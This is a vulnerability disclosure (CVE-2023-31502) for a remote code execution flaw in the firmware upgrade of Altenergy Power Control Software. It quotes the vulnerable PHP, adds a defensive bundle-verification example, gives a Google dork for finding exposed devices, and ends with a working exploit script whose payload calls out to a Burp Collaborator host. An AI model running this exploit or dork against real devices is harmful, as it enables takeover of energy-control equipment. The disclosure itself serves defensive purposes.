CVE-2023-31502: Disclosures/Insufficient_Verification_of_Data_Authenticity.MD at main · ahmedalroky/Disclosures
Altenergy Power Control Software C1.2.5 was discovered to contain a remote code execution (RCE) vulnerability via the component /models/management_model.php.
- **Title:** Insufficient verification of firmware integrity in "Altenergy Power Control Software" leads to RCE
- **SW version:** C1.2.5
- **Vendor:** https://apsystems.com/
- **Google Dork:** intitle:"Altenergy Power Control Software"
- **Affected device:** ENERGY COMMUNICATION UNIT
POC Video :
Vulnerable code :

`/home/local_web/pagesapplication/models/management_model.php`

```php
public function exec_upgrade_ecu() {
    $results = array();
    $res_array = array();

    exec("rm -rf /tmp/update_localweb/");

    if ($_FILES["file"]["error"] > 0)
    {
        array_push($res_array, "Return Code: " . $_FILES["file"]["error"] . "<br />");
        $results["value"] = 1;
    }
    else
    {
        array_push($res_array, "Upload: " . $_FILES["file"]["name"] . "<br />");
        array_push($res_array, "Type: " . $_FILES["file"]["type"] . "<br />");
        array_push($res_array, "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />");
        array_push($res_array, "Temp file: " . $_FILES["file"]["tmp_name"] . "<br />");
        // The upload is stored under its client-supplied name. Nothing checks who
        // produced it: no signature, no checksum, no allow-list of archive contents.
        move_uploaded_file($_FILES["file"]["tmp_name"], "/tmp/" . $_FILES["file"]["name"]);
        array_push($res_array, "Stored in: " . "/tmp/" . $_FILES["file"]["name"]);
        // The unverified archive is unpacked into /tmp (note that the client-supplied
        // filename is also interpolated unquoted into this shell command) ...
        exec("tar xjvf /tmp/".$_FILES["file"]["name"]." -C /tmp");
        exec("ls /tmp/update_localweb/assist", $temp, $value);
        // ... and whatever the archive placed at update_localweb/assist is executed
        // by the PHP process. An attacker controls that file, so this is RCE.
        exec("/tmp/update_localweb/assist &");
        $results["value"] = $value ? 1 : 0;
    }
    $results["result"] = implode("\n", $res_array);
    return $results;
}
```
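The missing step in `exec_upgrade_ecu()` is authenticating the bundle before anything in it is parsed or run. The following is an added example, not code from the disclosure or from the vendor: it builds a `.tar.bz2` in the same shape the ECU expects (`update_localweb/assist`), authenticates it, and only then inspects and unpacks it. An HMAC-SHA256 under a device-provisioned key stands in for the asymmetric signature (for example Ed25519 over the archive digest) a real product should use, so that the example runs with the Python standard library alone; the key, the file names and the `try_upgrade` wrapper are all assumptions made for the example.

```python
"""Added example (not from the advisory): authenticate an update bundle before
unpacking it, the check that exec_upgrade_ecu() in the disclosed code omits."""
import hashlib
import hmac
import io
import os
import tarfile
import tempfile

# Constructed demo secret. A real device would hold only a vendor *public* key and
# verify an asymmetric signature; a shared HMAC key can be lifted from firmware.
DEMO_KEY = b"device-provisioned-demo-key"
EXPECTED_ENTRYPOINT = "update_localweb/assist"  # the file the ECU executes after unpacking


def build_bundle(members: dict) -> bytes:
    """Build an in-memory .tar.bz2 from {name: bytes}; mirrors `tar cjvf` in the PoC."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:bz2") as tar:
        for name, data in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(data)
            info.mode = 0o755
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def sign_bundle(bundle: bytes, key: bytes = DEMO_KEY) -> bytes:
    """Vendor side: detached authentication tag over the exact archive bytes."""
    return hmac.new(key, bundle, hashlib.sha256).digest()


def _member_is_safe(info: tarfile.TarInfo, dest: str) -> bool:
    """Only regular files and directories that resolve inside dest are allowed:
    no symlinks/hardlinks/devices, no absolute paths, no '..' traversal."""
    if not (info.isfile() or info.isdir()):
        return False
    target = os.path.realpath(os.path.join(dest, info.name))
    return target == dest or target.startswith(dest + os.sep)


def verify_and_extract(bundle: bytes, tag: bytes, dest: str = None,
                       key: bytes = DEMO_KEY) -> dict:
    """Device side. Order matters: authenticate the bytes first, parse them second.
    Returns {member name: contents} for the regular files written under dest.
    Raises ValueError on any failure, before anything touches the filesystem."""
    if not hmac.compare_digest(sign_bundle(bundle, key), tag):
        raise ValueError("bundle authentication failed")
    dest = os.path.realpath(dest or tempfile.mkdtemp())
    extracted = {}
    with tarfile.open(fileobj=io.BytesIO(bundle), mode="r:bz2") as tar:
        members = tar.getmembers()
        bad = [m.name for m in members if not _member_is_safe(m, dest)]
        if bad:
            raise ValueError("unsafe archive members: %s" % bad)
        if EXPECTED_ENTRYPOINT not in [m.name for m in members]:
            raise ValueError("bundle lacks %s" % EXPECTED_ENTRYPOINT)
        # Manual extraction: every target path was validated above, and only
        # regular files are written, so tar can never follow a link out of dest.
        for m in members:
            target = os.path.join(dest, m.name)
            if m.isdir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            data = tar.extractfile(m).read()
            with open(target, "wb") as fh:
                fh.write(data)
            extracted[m.name] = data
    return extracted


def try_upgrade(bundle: bytes, tag: bytes, dest: str = None) -> dict:
    """What the upload handler should do: accept, or refuse with a reason."""
    try:
        files = verify_and_extract(bundle, tag, dest)
    except ValueError as exc:
        return {"accepted": False, "reason": str(exc), "files": {}}
    return {"accepted": True, "reason": "", "files": files}


if __name__ == "__main__":
    genuine = build_bundle({EXPECTED_ENTRYPOINT: b"#!/bin/sh\necho upgrade\n"})
    tag = sign_bundle(genuine)
    print("vendor bundle:", try_upgrade(genuine, tag)["accepted"])
    # Same shape as the PoC's b4db0t.bin, but the attacker cannot produce a valid tag.
    forged = build_bundle({EXPECTED_ENTRYPOINT: b"ping -c 1 example.invalid\n"})
    print("attacker bundle:", try_upgrade(forged, tag)["reason"])
```

Even with the tag check in place, the member validation is worth keeping: the disclosed handler shells out to `tar ... -C /tmp`, and a signed-but-mispackaged bundle containing `../` paths or symlinks would otherwise be able to write outside the update directory.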
Exploit :

exploit.sh

```bash
#!/bin/bash
# Build a .tar.bz2 laid out the way exec_upgrade_ecu() expects: the ECU unpacks it
# into /tmp and then runs /tmp/update_localweb/assist, so that file is our payload.
mkdir update_localweb 2>/dev/null
payload='ping -c 1 ahvmb8ham4hkik6ifzt7o8puyl4hs6.burpcollaborator.net'
echo "$payload" > update_localweb/assist
chmod 777 update_localweb/assist
tar cjvf b4db0t.bin update_localweb/
rm -rf update_localweb
```

Browse to http://<IP_ADDR>/index.php/management/upgrade_ecu and upload b4db0t.bin. When the ECU unpacks the archive and executes `/tmp/update_localweb/assist`, the `ping` reaches the Burp Collaborator host, which confirms command execution on the device.

POC :